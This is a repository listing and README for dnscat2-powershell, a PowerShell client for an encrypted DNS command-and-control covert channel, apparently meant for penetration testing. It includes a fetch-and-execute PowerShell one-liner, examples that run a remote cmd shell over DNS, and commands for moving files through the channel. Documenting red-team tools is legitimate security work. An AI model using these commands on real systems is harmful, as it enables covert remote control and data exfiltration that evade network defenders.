https://github.com/lukebaggett/dnscat2-powershell

A Powershell client for dnscat2, an encrypted DNS command and control tool.
https://github.com/lukebaggett/dnscat2-powershell

penetration-testing powershell security

Last synced: 2 days ago
JSON representation

A Powershell client for dnscat2, an encrypted DNS command and control tool.

• Host: GitHub
• URL: https://github.com/lukebaggett/dnscat2-powershell
• Owner: lukebaggett
• Archived: true
• Created: 2014-12-17T05:38:41.000Z (almost 10 years ago)
• Default Branch: master
• Last Pushed: 2023-08-22T03:20:46.000Z (about 1 year ago)
• Last Synced: 2024-08-01T09:26:04.846Z (3 months ago)
• Topics: penetration-testing, powershell, security
• Language: PowerShell
• Homepage: https://github.com/iagox86/dnscat2
• Size: 1 MB
• Stars: 388
• Watchers: 19
• Forks: 121
• Open Issues: 5
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• StarryDivineSky - lukebaggett/dnscat2-powershell

README

        
[dnscat2](https://github.com/iagox86/dnscat2) is a DNS covert channel tool by [@iagox86 (Ron Bowes)](https://blog.skullsecurity.org/) which is used to transfer data over DNS requests.

This is a powershell version of the dnscat2 C client.

[Click here for a blog post](http://www.blackhillsinfosec.com/?p=5578) that gives a more detailed breakdown of the purpose of this script, and how to use it.

To use this script, you'll need the ruby [dnscat2 server](https://github.com/iagox86/dnscat2). **Make sure to add the `--no-cache` option when running the server. This client is incompatible with the server's caching.**

### Setup

[First, install the dnscat2 server.](https://github.com/iagox86/dnscat2/blob/master/README.md) Start the server with caching disabled using `--no-cache`. The command to start your server should look something like this: `ruby dnscat2.rb --dns="domain=example.com" --no-cache`

Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:

    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

### Examples

Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using `-Domain`.

    Start a command session, and send DNS requests to 8.8.8.8 on port 53:

        Start-Dnscat2 -Domain  -DNSServer 8.8.8.8

    Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:

        Start-Dnscat2 -Domain  -Exec cmd

    Start a console session. Only use CNAME, MX, and AAAA requests:

        Start-Dnscat2 -Domain  -LookupTypes @("CNAME","MX","AAAA") -Console

    Do not encrypt the session. Encryption is enabled by default.

        Start-Dnscat2 -Domain  -NoEncryption

### Powershell Command Session Commands

The client can handle normal dnscat2 commands, or the *powershell version* of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):

    Start a new session which simulates a Powershell shell, like ExecPS:

        exec psh

    Upload app.exe on the server into a hex string stored in the $app powershell variable:

        upload app.exe hex:$app

    

    Download the byte array stored in the $app powershell variable to app.exe on the server:

        download bytes:$app app.exe

### Start-Dnscat2

    -Domain           The Domain being used by the dnscat2 server.

    -DNSServer        The hostname or IP Address to send DNS queries to. (Default: Set by Windows)

    -DNSPort           The port to send DNS queries to. (Default: 53)

    

    -Command                  Start a command session. (Default)

    -Exec             Link the I/O of a process with the Dnscat2 session.

    -Console                  Link the I/O of the console with the Dnscat2 session.

    -ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.

                              WARNING: Exiting will kill the entire dnscat2 client, not just the session.

    

    -PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.

    -NoEncryption             Do not use encryption.

    

    -LookupTypes    Set an array of lookup types to randomly switch between.

                              Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)

    -Delay             Set a delay between each request, in milliseconds. (Default: 0)

    -MaxRandomDelay    Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)

    -MaxPacketSize     Maximum length of a dnscat2 packet. (Default: 240)

    -Name             The name of your dnscat2 session. (Default: hostname)

### ExecPS and 'exec psh'

dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. **Watch out** for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.

### Other Credits

* [db9 on stackoverflow's](https://stackoverflow.com/users/6866918/db9) [demonstration of BouncyCastle ECDH.](http://stackoverflow.com/a/39662164)

* [FrankSpierings's](https://github.com/FrankSpierings) implementation of [Salsa20](https://gist.github.com/FrankSpierings/c18da658e06948313fff) and [Sha3](https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb) in Powershell via C#.

* [Rebex Labs stripped down version of the BouncyCastle DLL for ECC.](http://labs.rebex.net/curves)